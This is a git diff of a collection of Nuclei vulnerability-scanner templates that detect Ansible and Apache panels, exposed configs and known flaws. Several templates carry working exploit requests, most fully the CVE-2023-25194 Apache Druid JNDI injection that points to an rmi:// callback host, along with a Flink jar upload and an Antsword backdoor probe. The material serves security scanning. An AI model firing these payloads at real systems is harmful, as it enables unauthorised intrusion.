4b0a00483046022100bf020e7e2d3b06a43e585b146a2b8cd4394bea88271f1d13d4efb3a96460d95a022100d43ab83f2902c67fd8854e4d1f8daf8e1fceb8a59d3fdcb8ce065c96a1827a08:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/ansible-config-disclosure-326.yaml b/nuclei-templates/Other/ansible-config-disclosure-326.yaml deleted file mode 100644 index 92a9879206..0000000000 --- a/nuclei-templates/Other/ansible-config-disclosure-326.yaml +++ /dev/null @@ -1,18 +0,0 @@ -id: ansible-config-disclosure - -info: - name: Ansible Configuration Exposure - author: pdteam - severity: medium - tags: config,exposure - -requests: - - method: GET - path: - - '{{BaseURL}}/ansible.cfg' - matchers: - - type: word - words: - - '[defaults]' - - '[inventory]' - condition: and \ No newline at end of file diff --git a/nuclei-templates/Other/ansible-config-disclosure.yaml b/nuclei-templates/Other/ansible-config-disclosure.yaml new file mode 100644 index 0000000000..45c790f6a9 --- /dev/null +++ b/nuclei-templates/Other/ansible-config-disclosure.yaml @@ -0,0 +1,16 @@ +id: ansible-config-disclosure +info: + name: Ansible Configuration Exposure + author: pdteam + severity: medium + tags: config,exposure +requests: + - method: GET + path: + - '{{BaseURL}}/ansible.cfg' + matchers: + - type: word + words: + - '[defaults]' + - '[inventory]' + condition: and diff --git a/nuclei-templates/Other/ansible-semaphore-panel-327.yaml b/nuclei-templates/Other/ansible-semaphore-panel-327.yaml deleted file mode 100644 index 3d5fb94471..0000000000 --- a/nuclei-templates/Other/ansible-semaphore-panel-327.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: ansible-semaphore-panel - -info: - name: Ansible Semaphore Panel Detect - author: Yuzhe-zhang-0 - description: An Ansible Semaphore login panel was detected. - severity: info - reference: - - https://ansible-semaphore.com/ - - https://github.com/ansible-semaphore/semaphore - metadata: - shodan-query: http.html:"Semaphore" - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cwe-id: CWE-200 - tags: panel,ansible,semaphore,cicd,oss - -requests: - - method: GET - path: - - '{{BaseURL}}/auth/login' - - matchers-condition: or - matchers: - - type: word - words: - - 'Ansible Semaphore' - - - type: regex - regex: - - 'Semaphore' - -# Enhanced by mp on 2022/03/23 diff --git a/nuclei-templates/Other/ansible-semaphore-panel.yaml b/nuclei-templates/Other/ansible-semaphore-panel.yaml new file mode 100644 index 0000000000..0aa276d1d5 --- /dev/null +++ b/nuclei-templates/Other/ansible-semaphore-panel.yaml @@ -0,0 +1,26 @@ +id: ansible-semaphore-panel + +info: + name: Ansible Semaphore Panel + author: Yuzhe-zhang-0 + severity: info + reference: https://www.shodan.io/search?query=http.title%3A%22Ansible+Semaphore%22 + tags: panel,ansible,semaphore,cicd + +requests: + - method: GET + redirects: true + max-redirects: 5 + path: + - '{{BaseURL}}/' + + matchers-condition: and + matchers: + - type: word + words: + - 'Ansible Semaphore' + - '>Semaphore' + + - type: status + status: + - 200 \ No newline at end of file diff --git a/nuclei-templates/Other/ansible-tower-exposure-331.yaml b/nuclei-templates/Other/ansible-tower-exposure-331.yaml deleted file mode 100644 index 413cf6170f..0000000000 --- a/nuclei-templates/Other/ansible-tower-exposure-331.yaml +++ /dev/null @@ -1,40 +0,0 @@ -id: ansible-tower-exposure - -info: - name: Ansible Tower Exposure - author: pdteam,idealphase - severity: low - description: Ansible Tower was detected. Ansible Tower is a commercial offering that helps teams manage complex multi-tier deployments by adding control, knowledge, and delegation to Ansible-powered environments. - reference: - - https://docs.ansible.com/ansible-tower/3.8.4/html/administration/ - - https://docs.ansible.com/ansible-tower/latest/html/release-notes/index.html - metadata: - google-query: intitle:"Ansible Tower" - shodan-query: title:"Ansible Tower" - tags: panel,ansible - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cve-id: - cwe-id: CWE-200 - -requests: - - method: GET - path: - - '{{BaseURL}}' - - matchers: - - type: word - words: - - "Ansible Tower" - - "ansible-bootstrap" - condition: or - - extractors: - - type: regex - group: 1 - part: body - regex: - - 'href="\/static\/assets\/favicon\.ico\?v=(.+)" \/>' - -# Enhanced by mp on 2022/03/16 diff --git a/nuclei-templates/Other/ansible-tower-exposure-332.yaml b/nuclei-templates/Other/ansible-tower-exposure-332.yaml new file mode 100644 index 0000000000..72789c4755 --- /dev/null +++ b/nuclei-templates/Other/ansible-tower-exposure-332.yaml @@ -0,0 +1,19 @@ +id: ansible-tower-exposure + +info: + name: Ansible Tower Exposure + author: pdteam + severity: low + tags: panel + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers: + - type: word + words: + - "Ansible Tower" + - "ansible-main-menu" + condition: and \ No newline at end of file diff --git a/nuclei-templates/Other/antispam-bee.yaml b/nuclei-templates/Other/antispam-bee.yaml index 9926b74ac4..359671f3bd 100644 --- a/nuclei-templates/Other/antispam-bee.yaml +++ b/nuclei-templates/Other/antispam-bee.yaml @@ -11,7 +11,7 @@ info: wpscan: https://wpscan.com/plugin/antispam-bee tags: tech,wordpress,wp-plugin,top-100,top-200 -requests: +http: - method: GET path: diff --git a/nuclei-templates/Other/antsword-backdoor-335.yaml b/nuclei-templates/Other/antsword-backdoor-335.yaml deleted file mode 100644 index d3136b00c4..0000000000 --- a/nuclei-templates/Other/antsword-backdoor-335.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: antsword-backdoor - -info: - name: Antsword Backdoor Identified - author: ffffffff0x - severity: critical - description: The Antsword application contains a backdoor shell. - remediation: Reinstall Anstsword on a new system due to the target system's compromise. Follow best practices for securing PHP servers/applications via the php.ini and other mechanisms. - reference: https://github.com/AntSwordProject/AntSword-Labs/tree/master/bypass_disable_functions/9 - tags: backdoor,antsword - classification: - cwe-id: CWE-553 - cvss-score: 10.0 - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - -requests: - - method: POST - path: - - "{{BaseURL}}/.antproxy.php" - headers: - Content-Type: application/x-www-form-urlencoded - body: 'ant=echo md5("antproxy.php");' - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "951d11e51392117311602d0c25435d7f" - - - type: status - status: - - 200 - -# Enhanced by cs 2022/03/31 diff --git a/nuclei-templates/Other/antsword-backdoor.yaml b/nuclei-templates/Other/antsword-backdoor.yaml new file mode 100644 index 0000000000..160e514e1b --- /dev/null +++ b/nuclei-templates/Other/antsword-backdoor.yaml @@ -0,0 +1,24 @@ +id: antsword-backdoor +info: + name: Antsword backdook + author: ffffffff0x + severity: critical + description: 蚁剑「绕过 disable_functions」插件生成的 shell + reference: https://github.com/AntSwordProject/AntSword-Labs/tree/master/bypass_disable_functions/9 + tags: backdoor,antsword +requests: + - method: POST + path: + - "{{BaseURL}}/.antproxy.php" + headers: + Content-Type: application/x-www-form-urlencoded + body: 'ant=echo md5("antproxy.php");' + matchers-condition: and + matchers: + - type: word + part: body + words: + - "951d11e51392117311602d0c25435d7f" + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/AolynkBR304-weakPass.yaml b/nuclei-templates/Other/aolynkbr304-weakpass.yaml similarity index 100% rename from nuclei-templates/Other/AolynkBR304-weakPass.yaml rename to nuclei-templates/Other/aolynkbr304-weakpass.yaml diff --git a/nuclei-templates/Other/ap0calypse-malware.yaml b/nuclei-templates/Other/ap0calypse-malware.yaml index 55f1f59b8d..c60918be29 100644 --- a/nuclei-templates/Other/ap0calypse-malware.yaml +++ b/nuclei-templates/Other/ap0calypse-malware.yaml @@ -6,11 +6,9 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar tags: malware,file - file: - extensions: - all - matchers: - type: word part: raw @@ -21,4 +19,6 @@ file: - "Baslik" - "Dosyalars" - "Injecsiyon" - condition: and \ No newline at end of file + condition: and + +# digest: 4a0a004730450221009a4fe2a01a81f0ce6902dff99fd80899a03564015ef45e6a0cf97470115f32b3022027b355be70bb66fb654b7ea8d1cfc34de9d61102a4d5a66f8218b764b4d94897:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/apache-activemq-detect.yaml b/nuclei-templates/Other/apache-activemq-detect.yaml index 0c096a254b..a6428320a2 100644 --- a/nuclei-templates/Other/apache-activemq-detect.yaml +++ b/nuclei-templates/Other/apache-activemq-detect.yaml @@ -1,27 +1,29 @@ -id: apache-activemq-detect - -info: - name: Apache ActiveMQ Detection - author: pussycat0x - severity: info - description: | - Apache ActiveMQ is an open source message broker written in Java together with a full Java Message Service client. It provides "Enterprise Features" which in this case means fostering the communication from more than one client or server. - metadata: - verified: true - shodan-query: 'product:"Apache ActiveMQ"' - tags: network,activemq,oss - -network: - - inputs: - - data: "HELP\n\n\u0000" - - host: - - "{{Hostname}}" - - "{{Host}}:61613" - - matchers-condition: and - matchers: - - type: word - words: - - "Unknown STOMP action" - - "norg.apache.activemq.transport.stomp" +id: apache-activemq-detect + +info: + name: Apache ActiveMQ Detection + author: pussycat0x + severity: info + description: | + Apache ActiveMQ is an open source message broker written in Java together with a full Java Message Service client. It provides "Enterprise Features" which in this case means fostering the communication from more than one client or server. + metadata: + max-request: 1 + shodan-query: product:"Apache ActiveMQ" + verified: true + tags: network,activemq,oss,detect,apache + +tcp: + - inputs: + - data: "HELP\n\n\u0000" + + host: + - "{{Hostname}}" + port: 61613 + + matchers-condition: and + matchers: + - type: word + words: + - "Unknown STOMP action" + - "norg.apache.activemq.transport.stomp" +# digest: 490a00463044022033fe5150c7014f8708898bc413ba6b34a25fbe05eb62a95949dced8517b3fb97022025e014d08d8ae2f1c85aaced79e66f3da695214f8a893a354cef418ced51ba90:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/APACHE-Ambari-weakPass.yaml b/nuclei-templates/Other/apache-ambari-weakpass.yaml similarity index 100% rename from nuclei-templates/Other/APACHE-Ambari-weakPass.yaml rename to nuclei-templates/Other/apache-ambari-weakpass.yaml diff --git a/nuclei-templates/Other/apache-apisix-panel-336.yaml b/nuclei-templates/Other/apache-apisix-panel-336.yaml new file mode 100644 index 0000000000..2c6124e710 --- /dev/null +++ b/nuclei-templates/Other/apache-apisix-panel-336.yaml @@ -0,0 +1,30 @@ +id: apache-apisix-panel + +info: + name: Apache APISIX Login Panel + author: pikpikcu + severity: info + description: An Apache APISIX login panel was detected. + classification: + cwe-id: CWE-200 + metadata: + fofa-query: title="Apache APISIX Dashboard" + tags: apache,apisix,panel + +requests: + - method: GET + path: + - "{{BaseURL}}/user/login?redirect=%2F" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Apache APISIX Dashboard' + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/16 diff --git a/nuclei-templates/Other/apache-apisix-panel-337.yaml b/nuclei-templates/Other/apache-apisix-panel-337.yaml deleted file mode 100644 index 6d3f464a45..0000000000 --- a/nuclei-templates/Other/apache-apisix-panel-337.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: apache-apisix-panel - -info: - name: Apache APISIX Panel detect - author: pikpikcu - severity: info - metadata: - fofa-query: title="Apache APISIX Dashboard" - tags: apache,apisix,panel - -requests: - - method: GET - path: - - "{{BaseURL}}/user/login?redirect=%2F" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'Apache APISIX Dashboard' - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/apache-axis-detect-340.yaml b/nuclei-templates/Other/apache-axis-detect-340.yaml index 3d78cd86bd..b5b574a7b5 100644 --- a/nuclei-templates/Other/apache-axis-detect-340.yaml +++ b/nuclei-templates/Other/apache-axis-detect-340.yaml @@ -1,32 +1,32 @@ -id: apache-axis-detect - -info: - name: apache-axis-detect - author: dogasantos - severity: info - description: Axis and Axis2 detection - tags: tech,axis2,middleware,apache - -requests: - - method: GET - path: - - "{{BaseURL}}" - - "{{BaseURL}}/axis2/" - - "{{BaseURL}}/axis/" - - stop-at-first-match: true - matchers-condition: and - matchers: - - type: word - words: - - "Validate" - - "Welcome" - - "Axis" - - "deployed" - - "installation" - - "Admin" - condition: and - - - type: status - status: - - 200 +id: apache-axis-detect + +info: + name: apache-axis-detect + author: dogasantos + severity: info + description: Axis and Axis2 detection + tags: tech,axis2,middleware,apache + +requests: + - method: GET + path: + - "{{BaseURL}}" + - "{{BaseURL}}/axis2/" + - "{{BaseURL}}/axis/" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + words: + - "Validate" + - "Welcome" + - "Axis" + - "deployed" + - "installation" + - "Admin" + condition: and + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/apache-detect-348.yaml b/nuclei-templates/Other/apache-detect-348.yaml new file mode 100644 index 0000000000..4db33ceb08 --- /dev/null +++ b/nuclei-templates/Other/apache-detect-348.yaml @@ -0,0 +1,30 @@ +id: apache-detect +info: + name: Apache Detection + author: philippedelteil + description: Some Apache servers have the version on the response header. The OpenSSL version can be also obtained + severity: info + tags: tech,apache + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + + - type: regex + part: header + regex: + - "Apache+" + + - type: status + status: + - 200 + + extractors: + - type: kval + part: header + kval: + - Server \ No newline at end of file diff --git a/nuclei-templates/Other/apache-detect.yaml b/nuclei-templates/Other/apache-detect.yaml deleted file mode 100644 index ba499c5ea5..0000000000 --- a/nuclei-templates/Other/apache-detect.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: apache-detect -info: - name: Apache Detection - author: philippedelteil - description: Some Apache servers have the version on the response header. The OpenSSL version can be also obtained - severity: info - tags: tech,apache - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers-condition: and - matchers: - - - type: regex - part: header - regex: - - "Apache+" - - - type: status - status: - - 200 - - extractors: - - type: kval - part: header - kval: - - Server \ No newline at end of file diff --git a/nuclei-templates/Other/apache-drill-exposure.yaml b/nuclei-templates/Other/apache-drill-exposure.yaml index 7606bfbb86..5ae85c1fd8 100644 --- a/nuclei-templates/Other/apache-drill-exposure.yaml +++ b/nuclei-templates/Other/apache-drill-exposure.yaml @@ -4,12 +4,14 @@ info: name: Apache Drill Exposure author: DhiyaneshDK severity: low + description: Apache Drill is exposed. metadata: verified: true + max-request: 1 shodan-query: title:"Apache Drill" tags: misconfig,exposure,apache,drill -requests: +http: - method: GET path: - '{{BaseURL}}' @@ -29,3 +31,4 @@ requests: - type: status status: - 200 +# digest: 4a0a00473045022030a4b7d4ffd3e534e720562827eace6ff4cd882b42ea16bfc4f29e2acf204f03022100cc67ba72b9d427ec1d39676424f61bbca5cff7ad1cae2c5e09535a4d04f519d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/apache-druid-kafka-connect-rce.yaml b/nuclei-templates/Other/apache-druid-kafka-connect-rce.yaml new file mode 100644 index 0000000000..c250daba2a --- /dev/null +++ b/nuclei-templates/Other/apache-druid-kafka-connect-rce.yaml @@ -0,0 +1,99 @@ +id: CVE-2023-25194 + +info: + name: Apache Druid Kafka Connect - Remote Code Execution + author: j4vaovo + severity: high + description: | + The vulnerability has the potential to enable a remote attacker with authentication to run any code on the system. This is due to unsafe deserialization that occurs during the configuration of the connector through the Kafka Connect REST API + reference: + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-25194 + - https://nvd.nist.gov/vuln/detail/CVE-2023-25194 + - https://github.com/nbxiglk0/Note/blob/0ddc14ecd296df472726863aa5d1f0f29c8adcc4/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/Java/ApacheDruid/ApacheDruid%20Kafka-rce/ApacheDruid%20Kafka-rce.md#apachedruid-kafka-connect-rce + - http://packetstormsecurity.com/files/173151/Apache-Druid-JNDI-Injection-Remote-Code-Execution.html + - https://kafka.apache.org/cve-list + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2023-25194 + cwe-id: CWE-502 + epss-score: 0.89626 + epss-percentile: 0.98692 + cpe: cpe:2.3:a:apache:kafka_connect:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: apache + product: kafka_connect + shodan-query: html:"Apache Druid" + tags: packetstorm,cve,cve2023,apache,druid,kafka,rce,jndi,oast + +http: + - raw: + - | + POST /druid/indexer/v1/sampler?for=connect HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + { + "type":"kafka", + "spec":{ + "type":"kafka", + "ioConfig":{ + "type":"kafka", + "consumerProperties":{ + "bootstrap.servers":"127.0.0.1:6666", + "sasl.mechanism":"SCRAM-SHA-256", + "security.protocol":"SASL_SSL", + "sasl.jaas.config":"com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"rmi://{{interactsh-url}}:6666/test\" useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" group.provider.url=\"xxx\";" + }, + "topic":"test", + "useEarliestOffset":true, + "inputFormat":{ + "type":"regex", + "pattern":"([\\s\\S]*)", + "listDelimiter":"56616469-6de2-9da4-efb8-8f416e6e6965", + "columns":[ + "raw" + ] + } + }, + "dataSchema":{ + "dataSource":"sample", + "timestampSpec":{ + "column":"!!!_no_such_column_!!!", + "missingValue":"1970-01-01T00:00:00Z" + }, + "dimensionsSpec":{ + + }, + "granularitySpec":{ + "rollup":false + } + }, + "tuningConfig":{ + "type":"kafka" + } + }, + "samplerConfig":{ + "numRows":500, + "timeoutMs":15000 + } + } + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol + words: + - "dns" + + - type: word + part: body + words: + - 'RecordSupplier' + + - type: status + status: + - 400 +# digest: 4a0a00473045022100f788a795856513e1cd0015cba30415da3dd2e1a04d54f3ce0b6fb0f6f63e6ec9022005b2370ad3db8893c2793d0916510d1ddd938746e3cb8ef40eec403e4e3218d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/apache-druid-log4j.yaml b/nuclei-templates/Other/apache-druid-log4j.yaml index a3878d8502..a3d3d1fa20 100644 --- a/nuclei-templates/Other/apache-druid-log4j.yaml +++ b/nuclei-templates/Other/apache-druid-log4j.yaml @@ -4,14 +4,15 @@ info: name: Apache Druid - Remote Code Execution (Apache Log4j) author: SleepingBag945 severity: critical + description: Apache Druid is vulnerable to RCE due to Log4j. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10 cve-id: CVE-2021-44228 cwe-id: CWE-502 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Apache Druid" tags: cve,cve2021,rce,jndi,log4j,apache,druid,oast @@ -23,7 +24,7 @@ http: matchers-condition: and matchers: - type: word - part: interactsh_protocol # Confirms the DNS Interaction + part: interactsh_protocol # Confirms the DNS Interaction words: - "dns" @@ -35,3 +36,4 @@ http: - type: status status: - 404 +# digest: 490a00463044022030f1852a5d57ce940ce4fdb486ca500f0e80230abd9ef378a7fe2339e3a96812022023a04db5bf7848f414e848dfe20c4fc02efdb87b209cdf81956d9adad83e317b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/apache-druid-unauth.yaml b/nuclei-templates/Other/apache-druid-unauth.yaml index 3f3b004392..d029ca9367 100644 --- a/nuclei-templates/Other/apache-druid-unauth.yaml +++ b/nuclei-templates/Other/apache-druid-unauth.yaml @@ -4,19 +4,20 @@ info: name: Apache Druid Unauth author: DhiyaneshDk severity: low + description: Apache Druid is exposed to external users. metadata: verified: true + max-request: 1 shodan-query: title:"Apache Druid" tags: misconfig,druid,unauth,apache -requests: +http: - method: GET path: - '{{BaseURL}}/unified-console.html' matchers-condition: and matchers: - - type: word words: - 'Apache Druid' @@ -24,3 +25,4 @@ requests: - type: status status: - 200 +# digest: 4a0a00473045022032410ebe88dff06244ecd5348b0e4a3340bcc6cbab1c26d061e3231e039f3e610221009adb943521d59e4485ab6d9a04e2117e3db0c6dae660a5ff0aa31213e9b83d97:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/apache-dubbo-detect-351.yaml b/nuclei-templates/Other/apache-dubbo-detect.yaml similarity index 100% rename from nuclei-templates/Other/apache-dubbo-detect-351.yaml rename to nuclei-templates/Other/apache-dubbo-detect.yaml diff --git a/nuclei-templates/Other/apache-dubbo-unauth.yaml b/nuclei-templates/Other/apache-dubbo-unauth.yaml index 2246661ade..bd5e4743d4 100644 --- a/nuclei-templates/Other/apache-dubbo-unauth.yaml +++ b/nuclei-templates/Other/apache-dubbo-unauth.yaml @@ -4,21 +4,28 @@ info: name: Apache Dubbo - Unauthenticated Access author: j4vaovo severity: high - description: Apache Dubbo Unauthenticated Access. + description: | + Apache Dubbo Unauthenticated Access were detected. reference: - tags: network,dubbo,apache,unauth + - https://dubbo.apache.org/en/docs3-v2/java-sdk/advanced-features-and-usage/security/auth/ + metadata: + fofa-query: apache dubbo + max-request: 1 + verified: true + tags: network,dubbo,apache,unauth,misconfig -network: +tcp: - inputs: - data: "68656c700d0a" type: hex host: - "{{Hostname}}" - - "{{Host}}:20880" + port: 20880 read-size: 2048 matchers: - type: word words: - "trace [service] [method] [times]" +# digest: 4a0a00473045022019baed158798bd7636f8936ae6391035ee1f3cf0f6969604340953f8f06eb9530221009c8b40931f9eb4ebebf117f4b5fa3250df9ddb124d3973eb74145b11fa82e355:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/apache-filename-enum-354.yaml b/nuclei-templates/Other/apache-filename-enum-354.yaml new file mode 100644 index 0000000000..2e57212f9c --- /dev/null +++ b/nuclei-templates/Other/apache-filename-enum-354.yaml @@ -0,0 +1,30 @@ +id: apache-filename-enum + +info: + name: Apache Filename Enumeration + author: geeknik + description: If the client provides an invalid Accept header, the server will respond with a 406 Not Acceptable error containing a pseudo directory listing. + reference: + - https://hackerone.com/reports/210238 + - https://www.acunetix.com/vulnerabilities/web/apache-mod_negotiation-filename-bruteforcing/ + severity: low + tags: apache,misconfig + +requests: + - method: GET + headers: + Accept: "fake/value" + path: + - "{{BaseURL}}/index" + + matchers-condition: and + matchers: + - type: status + status: + - 406 + - type: word + words: + - "Not Acceptable" + - "Available variants:" + - "
Apache Server at" + condition: and diff --git a/nuclei-templates/Other/apache-filename-enum.yaml b/nuclei-templates/Other/apache-filename-enum.yaml deleted file mode 100644 index 5a6f43d2f1..0000000000 --- a/nuclei-templates/Other/apache-filename-enum.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: apache-filename-enum - -info: - name: Apache Filename Enumeration - author: geeknik - severity: low - description: If the client provides an invalid Accept header, the server will respond with a 406 Not Acceptable error containing a pseudo directory listing. - reference: - - https://hackerone.com/reports/210238 - - https://www.acunetix.com/vulnerabilities/web/apache-mod_negotiation-filename-bruteforcing/ - tags: apache,misconfig - -requests: - - method: GET - headers: - Accept: "fake/value" - path: - - "{{BaseURL}}/index" - - matchers-condition: and - matchers: - - type: status - status: - - 406 - - type: word - words: - - "Not Acceptable" - - "Available variants:" - - "
Apache Server at" - condition: and diff --git a/nuclei-templates/Other/apache-flink-unauth-rce-356.yaml b/nuclei-templates/Other/apache-flink-unauth-rce-356.yaml new file mode 100644 index 0000000000..30f848b7b7 --- /dev/null +++ b/nuclei-templates/Other/apache-flink-unauth-rce-356.yaml @@ -0,0 +1,44 @@ +id: apache-flink-unauth-rce +info: + name: Apache Flink - Remote Code Execution + author: pikpikcu + severity: critical + description: Apache Flink + reference: Apache Flink contains an unauthenticated remote code execution vulnerability. - https://www.exploit-db.com/exploits/48978 - https://adamc95.medium.com/apache-flink-1-9-x-part-1-set-up-5d85fd2770f3 - https://github.com/LandGrey/flink-unauth-rce + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cve-id: + cwe-id: CWE-77 + tags: apache,flink,rce,intrusive,unauth +requests: + - raw: + - | + POST /jars/upload HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data;boundary=8ce4b16b22b58894aa86c421e8759df3 + + --8ce4b16b22b58894aa86c421e8759df3 + Content-Disposition: form-data; name="jarfile";filename="poc.jar" + Content-Type:application/octet-stream + + {{randstr}} + --8ce4b16b22b58894aa86c421e8759df3-- + matchers-condition: and + matchers: + - type: word + words: + - "application/json" + part: header + condition: and + - type: word + words: + - "success" + - "_poc.jar" + part: body + condition: and + - type: status + status: + - 200 + +# Enhanced by mp on 2022/05/23 diff --git a/nuclei-templates/Other/apache-flink-unauth-rce-358.yaml b/nuclei-templates/Other/apache-flink-unauth-rce-358.yaml deleted file mode 100644 index 196536f66e..0000000000 --- a/nuclei-templates/Other/apache-flink-unauth-rce-358.yaml +++ /dev/null @@ -1,39 +0,0 @@ -id: apache-flink-unauth-rce -info: - name: Apache Flink Unauth RCE - author: pikpikcu - severity: critical - tags: apache,flink,rce,intrusive,unauth - reference: - - https://www.exploit-db.com/exploits/48978 - - https://adamc95.medium.com/apache-flink-1-9-x-part-1-set-up-5d85fd2770f3 - - https://github.com/LandGrey/flink-unauth-rce -requests: - - raw: - - | - POST /jars/upload HTTP/1.1 - Host: {{Hostname}} - Content-Type: multipart/form-data;boundary=8ce4b16b22b58894aa86c421e8759df3 - - --8ce4b16b22b58894aa86c421e8759df3 - Content-Disposition: form-data; name="jarfile";filename="poc.jar" - Content-Type:application/octet-stream - - {{randstr}} - --8ce4b16b22b58894aa86c421e8759df3-- - matchers-condition: and - matchers: - - type: word - words: - - "application/json" - part: header - condition: and - - type: word - words: - - "success" - - "_poc.jar" - part: body - condition: and - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/apache-guacamole-361.yaml b/nuclei-templates/Other/apache-guacamole.yaml similarity index 100% rename from nuclei-templates/Other/apache-guacamole-361.yaml rename to nuclei-templates/Other/apache-guacamole.yaml diff --git a/nuclei-templates/Other/default-cred-hertzbeat.yaml b/nuclei-templates/Other/apache-hertzbeat-default-login.yaml similarity index 100% rename from nuclei-templates/Other/default-cred-hertzbeat.yaml rename to nuclei-templates/Other/apache-hertzbeat-default-login.yaml diff --git a/nuclei-templates/Other/apache-httpd-rce-362.yaml b/nuclei-templates/Other/apache-httpd-rce.yaml similarity index 100% rename from nuclei-templates/Other/apache-httpd-rce-362.yaml rename to nuclei-templates/Other/apache-httpd-rce.yaml diff --git a/nuclei-templates/Other/apache-jmeter-dashboard.yaml b/nuclei-templates/Other/apache-jmeter-dashboard.yaml index c3aebac1ec..e104e72e0b 100644 --- a/nuclei-templates/Other/apache-jmeter-dashboard.yaml +++ b/nuclei-templates/Other/apache-jmeter-dashboard.yaml @@ -7,14 +7,17 @@ info: description: Apache JMeter Dashboard login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 cwe-id: CWE-200 + cpe: cpe:2.3:a:apache:jmeter:*:*:*:*:*:*:*:* metadata: - verified: true + max-request: 1 + product: jmeter shodan-query: title:"Apache JMeter Dashboard" + vendor: apache + verified: true tags: apache,jmeter,panel -requests: +http: - method: GET path: - '{{BaseURL}}' @@ -31,5 +34,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2022/11/28 +# digest: 4b0a00483046022100eb1037efc1fcc4364852312de1e209a9c5c8f63370a2aa20fe94a5769e4d1f1b022100bd3d0e91dac1f7227fa5ed97915b314c793c608f80806675bf6fcd2aaac8179c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/apache-karaf-panel.yaml b/nuclei-templates/Other/apache-karaf-panel.yaml index d285acce99..367f6dd2ce 100644 --- a/nuclei-templates/Other/apache-karaf-panel.yaml +++ b/nuclei-templates/Other/apache-karaf-panel.yaml @@ -6,10 +6,11 @@ info: severity: info metadata: verified: true + max-request: 1 shodan-query: realm="karaf" tags: tech,apache,karaf -requests: +http: - method: GET path: - "{{BaseURL}}/system/console" @@ -19,3 +20,5 @@ requests: part: header words: - 'realm="karaf' + +# digest: 4a0a0047304502202851728e6494910ea649f13669b2cee5bc1aee43f144efa79b496fac38663c7a022100ad86df88ceee1fed9ec1d6133ad75c0682c93442a1471137e5f4e19d539d8eba:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/apache-licenserc.yaml b/nuclei-templates/Other/apache-licenserc.yaml index e4a3244678..27f95108a6 100644 --- a/nuclei-templates/Other/apache-licenserc.yaml +++ b/nuclei-templates/Other/apache-licenserc.yaml @@ -4,11 +4,13 @@ info: name: Apache License File author: DhiyaneshDk severity: low + description: Apache License file is exposed. metadata: verified: true + max-request: 1 tags: exposure,file,apache -requests: +http: - method: GET path: - '{{BaseURL}}/.licenserc.yaml' @@ -26,3 +28,4 @@ requests: - type: status status: - 200 +# digest: 4a0a00473045022100a7b6b74566bfe96af86fd10280118edf84d552b48aacc47b665d0bd870b7491b02203d5f73ba21c11c23f632f3fc9498159f1bd6423c9f11896fcef809c03493328f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/apache-mesos-panel.yaml b/nuclei-templates/Other/apache-mesos-panel.yaml index 4d9384da7a..b482f4fd1b 100644 --- a/nuclei-templates/Other/apache-mesos-panel.yaml +++ b/nuclei-templates/Other/apache-mesos-panel.yaml @@ -7,21 +7,25 @@ info: description: Apache Mesos panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 cwe-id: CWE-200 + cpe: cpe:2.3:a:apache:mesos:*:*:*:*:jenkins:*:*:* metadata: - verified: true - shodan-query: http.title:"Mesos" fofa-query: app="APACHE-MESOS" + max-request: 2 + product: mesos + 